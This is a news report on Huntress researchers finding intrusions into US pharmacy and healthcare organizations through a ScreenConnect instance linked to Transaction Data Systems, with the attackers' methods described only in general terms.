Security researchers have issued a warning about hackers targeting multiple healthcare organizations in the U.S. by exploiting the ScreenConnect remote access tool. They have identified the use of local ScreenConnect instances by Transaction Data Systems (TDS), a pharmacy supply chain and management systems solution provider operating in all 50 states.
The attacks were spotted by researchers at managed security platform Huntress, who observed them on endpoints from two different healthcare organizations. They also detected activity indicating network reconnaissance in preparation for further attacks.
The intrusions were observed between October 28 and November 8, 2023, and are believed to still be ongoing.
Huntress reports that the attacks share similar tactics, techniques, and procedures (TTPs). These include the downloading of a payload named text.xml, indicating that the same actor is responsible for all observed incidents.
The .XML contains C# code that loads the Metasploit attack payload Meterpreter into the system memory, using non-PowerShell to avoid detection. Huntress also observed additional processes being launched using the Printer Spooler service.
The compromised endpoints run on a Windows Server 2019 system and are associated with two distinct organizations – one in the pharmaceutical sector and the other in healthcare. The common link between them is a ScreenConnect instance.
The remote access tool was used to install additional payloads, execute commands, transfer files, and install AnyDesk. The hackers also tried to create new user accounts for persistent access.
Researchers identified the ScreenConnect instance as being tied to the ‘rs.tdsclinical[.]com’ domain associated with TDS. It remains unclear if TDS suffered a breach, if credentials to one of their accounts were compromised, or if the attackers exploited a different mechanism.
Huntress made multiple attempts to notify TDS, now known as ‘Outcomes’ following a merger last summer, but the company did not respond.